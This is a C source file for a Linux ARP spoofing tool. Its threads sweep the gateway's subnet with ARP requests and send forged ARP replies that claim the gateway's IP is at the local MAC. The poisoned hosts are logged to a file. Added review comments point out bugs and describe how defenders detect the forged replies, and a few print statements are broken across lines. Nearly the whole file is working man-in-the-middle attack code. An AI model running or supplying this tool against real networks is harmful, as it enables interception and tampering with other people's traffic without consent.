#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_arp.h>
#include <netdb.h>
#include <errno.h>
#include <linux/if_ether.h>
#include <arpa/inet.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netinet/tcp.h>
#include <pthread.h>
/* Name of the interface whose index, MAC and IPv4 address main() queries with ioctl(). Hard-coded. */
#define ETH_INT "eth0"
/* Program name, version and build-time strings; name and version are printed by -v/-V, MAKETIME on the line after. */
#define PROGRAME_NAME "linux_arp_spoof"
#define PROGRAME_VERSION "1.0.1.19"
#define MAKETIME "08/11/30 17:21"
/* AF_PACKET raw socket opened in main(); every thread sends or receives on it. */
int sockfd;
/* Written by get_arp_reply() (set to 1) and read/cleared by send_one_arp().
 * NOTE(review): a plain int shared between threads with no lock or atomic type. */
int send_arp_flag = 0;
/* Handles for the "iplist" file: fp1 is assigned in get_arp_reply(), fp2 in send_one_arp().
 * Being file-scope, both handles are reachable from both threads. */
FILE *fp1,*fp2;
/* Link-layer address passed to every sendto(); main() fills sll_ifindex and sll_protocol.
 * NOTE(review): a file-scope identifier that starts with an underscore is reserved for the implementation. */
struct sockaddr_ll _sockaddr;
/* IPv4 address of ETH_INT, one octet per element; filled in main(). */
unsigned char my_ip[4];
/* Hardware address of ETH_INT; filled in main() from SIOCGIFHWADDR. */
unsigned char my_mac[6];
/* Gateway address parsed from argv[1] in main(). */
unsigned char gateway_ip[4];
/* Starts as a copy of gateway_ip; send_arp() overwrites the last octet for each address it queries. */
unsigned char attack_ip[4];
/* Ethernet broadcast address used as destination of the ARP requests. */
unsigned char broadcast_mac[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
/* Ethernet header as laid out on the wire: destination MAC, source MAC, EtherType (6+6+2 = 14 bytes). */
struct frame_hdr
{
unsigned char dst_mac[6];
unsigned char src_mac[6];
// EtherType in network byte order; the senders in this file store htons(ETH_P_ARP)
unsigned short frm_type;
};
/* Complete ARP-over-Ethernet frame as this file sends and parses it: the Ethernet
 * header (14 bytes), the fixed ARP header fields in struct arphdr, then the
 * sender MAC/IP and target MAC/IP (6+4+6+4 = 20 bytes). The original comment
 * gives the total as 14+8+20 bytes.
 * NOTE(review): the struct has no packed attribute, and get_arp_reply() casts a
 * receive buffer to this type, so the code depends on the compiler inserting
 * no padding between members. */
struct frame_ether
{
struct frame_hdr fh;
struct arphdr ah;
unsigned char src_mac[6]; // ARP sender hardware address
unsigned char src_ip[4]; // ARP sender protocol address
unsigned char dst_mac[6]; // ARP target hardware address
unsigned char dst_ip[4]; // ARP target protocol address
};
/*
 * Thread entry point (started third by main()). Loops forever; whenever
 * send_arp_flag is 1 it builds a broadcast ARP request carrying this host's
 * own MAC and IP as sender and sends one request per address read from the
 * "iplist" file, then clears the flag. get_arp_reply() sets the flag when it
 * sees an ARP request whose sender or target last octet matches the gateway's.
 *
 * The function is declared to return void * but never returns.
 *
 * NOTE(review), robustness / memory safety:
 *  - The outer loop spins without sleeping while the flag is 0, and the flag
 *    is read and written across threads without synchronisation.
 *  - "iplist" is opened into fp2, but the read loop uses fp1, a handle that
 *    only get_arp_reply() opens and closes. Depending on timing fp1 is NULL,
 *    already closed, or in use by the other thread.
 *  - fscanf() is given "%d" with pointers to unsigned char; each conversion
 *    stores an int, so it writes past d_ip[]. Its return value is not checked.
 *  - fclose(fp2) sits outside the if that tests fopen(), so it also runs when
 *    fopen() returned NULL.
 */
void *send_one_arp()
{
for(;;)
{
if(send_arp_flag == 1)
{
unsigned char d_ip[4];
struct frame_ether frame;
// Ethernet header: broadcast destination, own MAC as source, EtherType ARP
memcpy(frame.fh.dst_mac,broadcast_mac,6);
memcpy(frame.fh.src_mac,my_mac,6);
frame.fh.frm_type = htons(ETH_P_ARP);
// Fixed ARP header: Ethernet/IPv4, 6-byte hardware and 4-byte protocol addresses, opcode request
frame.ah.ar_hrd = htons(ARPHRD_ETHER);
frame.ah.ar_pro = htons(ETH_P_IP);
frame.ah.ar_hln = 6;
frame.ah.ar_pln = 4;
frame.ah.ar_op = htons(ARPOP_REQUEST);
// Sender fields carry this host's own addresses; target MAC is set to broadcast
memcpy(frame.src_mac,my_mac,6);
memcpy(frame.src_ip,my_ip,4);
memcpy(frame.dst_mac,broadcast_mac,6);
// NOTE(review): the handle assigned here is fp2, the loop below reads fp1
if(fp2=fopen("iplist","r"))
{
while(!feof(fp1))
{
// printf("%d.%d.%d.%d\n",d_ip[0],d_ip[1],d_ip[2],d_ip[3]);
// NOTE(review): "%d" expects int *, the arguments are unsigned char *; result unchecked
fscanf(fp1,"%d.%d.%d.%d\n",&d_ip[0],&d_ip[1],&d_ip[2],&d_ip[3]);
memcpy(frame.dst_ip,d_ip,4);
int arp_request = sendto(sockfd,&frame,sizeof(frame),0,(struct sockaddr*)
&_sockaddr,sizeof(_sockaddr));
if(arp_request > 0)
{
// Log the request that was sent. NOTE(review): the first string literal is
// split across two lines in this listing and does not compile as printed.
printf("--------------------------------------------------------------------
-----------\n");
printf("[%02x:%02x:%02x:%02x:%02x:%02x](%d.%d.%d.%d)",my_mac[0],my_mac
[1],my_mac[2],my_mac[3],my_mac[4],my_mac[5],my_ip[0],my_ip[1],my_ip[2],my_ip[3]);
printf("\t ---request (broadcast)--->\t");
printf("[%02x:%02x:%02x:%02x:%02x:%02x](%d.%d.%d.%d)\n",broadcast_mac
[0],broadcast_mac[1],broadcast_mac[2],broadcast_mac[3],broadcast_mac[4],broadcast_mac[5],d_ip[0],d_ip[1],d_ip[2],d_ip[3]);
}
else
{
perror("sendto");
}
}
}
// NOTE(review): reached even when fopen() failed and fp2 is NULL
fclose(fp2);
send_arp_flag = 0;
}
}
}
/*
 * Thread entry point (started first by main()). Builds one broadcast ARP
 * request template with this host's MAC/IP as sender, then loops forever:
 * for last octets 1..254 it skips the gateway's and this host's own last
 * octet and broadcasts a request for every other address. The first three
 * octets come from attack_ip, which main() copies from the gateway argument,
 * so the sweep covers the gateway's network as if it were a /24.
 *
 * Pacing visible in the code: a 2-second sleep whenever i is a multiple of
 * 10, and a 3-second sleep after each full pass.
 *
 * Seen from the network this is a repeating ARP request sweep from a single
 * source across all host addresses of the segment, which per-source ARP rate
 * thresholds and ARP monitoring tools are able to flag.
 *
 * The function is declared to return void * but never returns.
 */
void *send_arp()
{
int i;
struct frame_ether frame;
memset(&frame,0,sizeof(frame));
/* set ether head */
memcpy(frame.fh.dst_mac,broadcast_mac,6);
memcpy(frame.fh.src_mac,my_mac,6);
frame.fh.frm_type = htons(ETH_P_ARP);
/* define arp ether head */
frame.ah.ar_hrd = htons(ARPHRD_ETHER);
frame.ah.ar_pro = htons(ETH_P_IP);
frame.ah.ar_hln = 6;
frame.ah.ar_pln = 4;
frame.ah.ar_op = htons(ARPOP_REQUEST);
memcpy(frame.src_mac,my_mac,6);
memcpy(frame.src_ip,my_ip,4);
memcpy(frame.dst_mac,broadcast_mac,6);
/* send arp request broadcast */
for(;;)
{
for(i=1;i<255;i++)
{
// pause 2 seconds at every tenth address
if((i%10) == 0)
sleep(2);
// only the last octet is compared, so the gateway and this host are skipped by last octet alone
if(i == gateway_ip[3] || i == my_ip[3])
{
continue;
}
else
{
// attack_ip is a global; this thread is the only writer after start-up
attack_ip[3] = i;
memcpy(frame.dst_ip,attack_ip,4);
int arp_request = sendto(sockfd, &frame, sizeof(frame), 0, (struct sockaddr*)&_sockaddr,
sizeof(_sockaddr));
// prints the sendto() return value (bytes sent, or -1) before it is tested
printf("size of : %d\n",arp_request);
if(arp_request > 0)
{
// NOTE(review): the first string literal is split across two lines in this
// listing and does not compile as printed.
printf("----------------------------------------------------------------------------
---\n");
printf("[%02x:%02x:%02x:%02x:%02x:%02x](%d.%d.%d.%d)",my_mac[0],my_mac[1],my_mac
[2],my_mac[3],my_mac[4],my_mac[5],my_ip[0],my_ip[1],my_ip[2],my_ip[3]);
printf("\t ---request (broadcast)--->\t");
printf("[%02x:%02x:%02x:%02x:%02x:%02x](%d.%d.%d.%d)\n",broadcast_mac
[0],broadcast_mac[1],broadcast_mac[2],broadcast_mac[3],broadcast_mac[4],broadcast_mac[5],attack_ip[0],attack_ip[1],attack_ip
[2],attack_ip[3]);
}
else
{
perror("sendto");
}
}
}
// wait 3 seconds between passes
sleep(3);
}
}
/*
 * Thread entry point (started second by main()). Receives frames on the raw
 * socket forever, prints sender and target of every ARP frame, and:
 *
 *  1. For an ARP reply whose target last octet equals this host's and whose
 *     sender last octet differs from the gateway's, sends back an ARP reply
 *     to that sender in which the sender IP is gateway_ip and the sender MAC
 *     and Ethernet source are my_mac. On success the sender's address is
 *     appended to "iplist" unless an entry with the same last octet exists.
 *  2. For an ARP request whose sender or target last octet equals the
 *     gateway's, sets send_arp_flag so send_one_arp() runs a pass.
 *
 * What this looks like to a defender: an ARP reply binding the gateway's IP
 * to a MAC that is not the gateway's, with Ethernet source equal to the ARP
 * sender hardware address. Switch-side Dynamic ARP Inspection, a static ARP
 * entry for the gateway on hosts, and monitoring for changes of the gateway's
 * IP-to-MAC binding all key on that mismatch.
 *
 * The function is declared to return void * but never returns.
 *
 * NOTE(review), robustness / memory safety:
 *  - The recv() result n is never examined, so an error return or a frame
 *    shorter than struct frame_ether is parsed anyway from whatever buf holds.
 *  - All address tests compare only the last octet.
 *  - fscanf() is given "%d" with pointers to unsigned char; each conversion
 *    stores an int, so it writes past b_ip[]. Its return value is not checked,
 *    and b_ip is read afterwards even if nothing was converted.
 *  - fclose(fp1) sits outside the if that tests fopen(), so it also runs when
 *    fopen() returned NULL. fp1 is also touched by send_one_arp().
 *  - The local i is never used.
 */
void *get_arp_reply()
{
int flag,i=0;
unsigned char b_ip[4];
char buf[2048];
for(;;)
{
// NOTE(review): n is not checked before buf is interpreted
int n = recv(sockfd,buf,2048,0);
struct ethhdr *eth = (struct ethhdr *) buf;
if((ntohs(eth->h_proto)) == ETH_P_ARP)
{
printf("-------------------------------------------------------------------------------\n");
// old_frame aliases the receive buffer; frame is a copy that is edited into the outgoing reply
struct frame_ether *old_frame = (struct frame_ether*)buf;
struct frame_ether frame;
memcpy(&frame,buf,sizeof(frame));
int ar_op = ntohs(frame.ah.ar_op);
//----------------arp frame info--------------------------------------//
char ip_buf[100];
inet_ntop(AF_INET, &old_frame->src_ip, ip_buf, 100);
printf("[%02x:%02x:%02x:%02x:%02x:%02x](%s)", old_frame->src_mac[0],old_frame->src_mac[1],old_frame-
>src_mac[2],old_frame->src_mac[3],old_frame->src_mac[4],old_frame->src_mac[5], ip_buf);
printf("\t ---");
// opcode 2 is printed as a reply, opcode 1 as a request; other opcodes print nothing here
if(ar_op == 2)
printf("reply--->\t");
if(ar_op == 1)
printf("request--->\t");
memset(ip_buf,0,100);
inet_ntop(AF_INET, &old_frame->dst_ip, ip_buf, 100);
printf("[%02x:%02x:%02x:%02x:%02x:%02x](%s)", old_frame->dst_mac[0],old_frame->dst_mac[1],old_frame-
>dst_mac[2],old_frame->dst_mac[3],old_frame->dst_mac[4],old_frame->dst_mac[5], ip_buf);
printf("\n");
//--------------------fake arp frame----------------------------//
if(ar_op == ARPOP_REPLY && (old_frame->dst_ip)[3] == my_ip[3] && (old_frame->src_ip)[3] !=
gateway_ip[3])
{// an ARP reply whose target last octet is this host's and whose sender last octet is not the gateway's
// build the forged ARP reply: addressed to the original sender, claiming gateway_ip is at my_mac
memcpy(frame.fh.dst_mac,old_frame->fh.src_mac,6);
memcpy(frame.fh.src_mac,my_mac,6);
frame.ah.ar_op = htons(ARPOP_REPLY);
memcpy(frame.dst_mac,old_frame->fh.src_mac,6);
memcpy(frame.dst_ip,old_frame->src_ip,4);
memcpy(frame.src_mac,my_mac,6);
memcpy(frame.src_ip,gateway_ip,4);
// send the forged ARP reply
int arp_reply = sendto(sockfd,&frame,sizeof(frame),0,(struct sockaddr*)&_sockaddr,sizeof
(_sockaddr));
if(arp_reply > 0)
{
// flag becomes 1 if the sender's last octet is already recorded in "iplist"
flag = 0;
printf("send faked arp reply to %d.%d.%d.%d \n",(old_frame->src_ip)[0],(old_frame-
>src_ip)[1],(old_frame->src_ip)[2],(old_frame->src_ip)[3]);
// NOTE(review): "ar+" is not a mode string defined by the C standard (append/update is "a+");
// how fopen() treats it is implementation-specific.
if(fp1=fopen("iplist","ar+"))
{
while(!feof(fp1))
{
// NOTE(review): "%d" expects int *, the arguments are unsigned char *; result unchecked
fscanf(fp1,"%d.%d.%d.%d\n",&b_ip[0],&b_ip[1],&b_ip[2],&b_ip[3]);
if(b_ip[3] == (old_frame->src_ip)[3])
{
flag = 1;
break;
}
}
if(flag == 0)
{
fprintf(fp1,"%d.%d.%d.%d\n",(old_frame->src_ip)[0],(old_frame-
>src_ip)[1],(old_frame->src_ip)[2],(old_frame->src_ip)[3]);
}
}
// NOTE(review): reached even when fopen() failed and fp1 is NULL
fclose(fp1);
}
else
{
perror("sendto");
}
}
// && binds tighter than ||, so this reads (request from gateway) || (request for gateway)
if(ar_op == ARPOP_REQUEST && (old_frame->src_ip)[3] == gateway_ip[3] || ar_op == ARPOP_REQUEST &&
(old_frame->dst_ip)[3] == gateway_ip[3]/* || ar_op == ARPOP_REPLY && (old_frame->src_ip)[3] == gateway_ip[3]*/)
{
// unsynchronised write; send_one_arp() polls this flag
send_arp_flag = 1;
}
}
}
}
/*
 * Program entry. Accepts exactly one argument: -v/-V (print version), -h/-H
 * (print usage) or the gateway's dotted-quad IPv4 address. It then opens an
 * AF_PACKET raw socket for ARP, reads index, MAC and IPv4 address of ETH_INT
 * with ioctl(), stores the local and gateway addresses in the globals,
 * deletes any existing "iplist" file and starts the three worker threads
 * (send_arp, get_arp_reply, send_one_arp). The workers never return, so the
 * pthread_join() calls block indefinitely.
 *
 * On Linux an AF_PACKET socket requires CAP_NET_RAW, so socket() fails for an
 * unprivileged process.
 *
 * Exit codes are inconsistent: -v and -h exit with 1, and two failure paths
 * (socket(), SIOCGIFADDR) exit with 0.
 *
 * NOTE(review), robustness:
 *  - inet_addr() signals failure with INADDR_NONE, an unsigned 32-bit value
 *    with all bits set; after the cast to long the "< 0" test only catches
 *    it where long is 32 bits wide.
 *  - memset(&ifr,0,sizeof(&ifr)) clears only pointer-size bytes of ifr.
 *  - Neither sscanf() result is checked and octets are not range-checked
 *    before being narrowed to unsigned char.
 *  - The local "attack" is never used.
 */
int main(int argc, char **argv)
{
unsigned char *attack;
if(argc == 2)
{
if((strcmp(argv[1],"-v"))==0||(strcmp(argv[1],"-V"))==0)
{
printf("%s version %s\n", PROGRAME_NAME,PROGRAME_VERSION);
printf("last make date : %s\n",MAKETIME);
exit(1);
}
if((strcmp(argv[1],"-h"))==0||(strcmp(argv[1],"-H"))==0)
{
printf("usage : ./linux_arp_spoof [gatewayip]\n");
exit(1);
}
// NOTE(review): see header comment; this test depends on the width of long
if((long)inet_addr(argv[1]) < 0)
{
printf("parameter error : IP error. \n");
exit(1);
}
}
else
{
printf("parameter error,please check -h \n");
exit(-1);
}
int i;
unsigned char *cp_ip;
unsigned int src_ip[4];
struct sockaddr_in sin;
struct ifreq ifr;
// raw link-layer socket that only carries EtherType ARP
if((sockfd=socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP)))<0)
{
perror("socket");
exit(0);
}
memset(&_sockaddr,0,sizeof(_sockaddr));
// NOTE(review): sizeof(&ifr) is the size of a pointer, not of struct ifreq
memset(&ifr,0,sizeof(&ifr));
// which interface in work mode
strcpy(ifr.ifr_name,ETH_INT);
if(ioctl(sockfd,SIOCGIFINDEX,&ifr) != 0)
{
perror("ioctl");
close(sockfd);
exit(1);
}
//get local mac
if(ioctl(sockfd,SIOCGIFHWADDR,&ifr) < 0)
{
perror("ioctl");
close(sockfd);
exit(2);
}
// my_mac = ifr.ifr_hwaddr.sa_data;
for(i=0;i<6;i++)
{
my_mac[i] = (unsigned char)ifr.ifr_hwaddr.sa_data[i];
}
//get local ip
if(ioctl(sockfd,SIOCGIFADDR,&ifr) < 0)
{
perror("ioctl");
close(sockfd);
exit(0);
}
memcpy(&sin, &ifr.ifr_addr, sizeof(sin));
// printf("%s \n",inet_ntoa(sin.sin_addr));
// initialise parameters: derive the local address, then the gateway and its network prefix
// The local address is formatted to text and parsed back into four octets.
cp_ip = (unsigned char *)inet_ntoa(sin.sin_addr);
sscanf(cp_ip,"%d.%d.%d.%d",&src_ip[0],&src_ip[1],&src_ip[2],&src_ip[3]);
for(i=0;i<4;i++)
{
my_ip[i] = src_ip[i];
}
// Parse the gateway argument. NOTE(review): if this sscanf() converts fewer than four
// fields, the remaining src_ip elements still hold the local address parsed above.
cp_ip = argv[1];
sscanf(cp_ip,"%d.%d.%d.%d",&src_ip[0],&src_ip[1],&src_ip[2],&src_ip[3]);
for(i=0;i<4;i++)
{
gateway_ip[i] = src_ip[i];
attack_ip[i] = src_ip[i];
}
// fill the link-layer address that every sendto() in the workers uses
_sockaddr.sll_ifindex = ifr.ifr_ifindex;
_sockaddr.sll_protocol = htons(ETH_P_ARP);
// create the worker threads
// "iplist" is a relative path, so it is removed from (and later created in) the current working directory
remove("iplist");
pthread_t id[3];
memset(&id,0,sizeof(id));
if(pthread_create(&id[0],NULL,send_arp,NULL) !=0)
{
printf("create pthread1 error\n");
exit(1);
}
if(pthread_create(&id[1],NULL,get_arp_reply,NULL) !=0)
{
printf("create pthread2 error\n");
exit(1);
}
if(pthread_create(&id[2],NULL,send_one_arp,NULL) !=0)
{
printf("create pthread3 error\n");
exit(1);
}
// the workers loop forever, so these joins do not return in normal operation
pthread_join(id[0],NULL);
pthread_join(id[1],NULL);
pthread_join(id[2],NULL);
}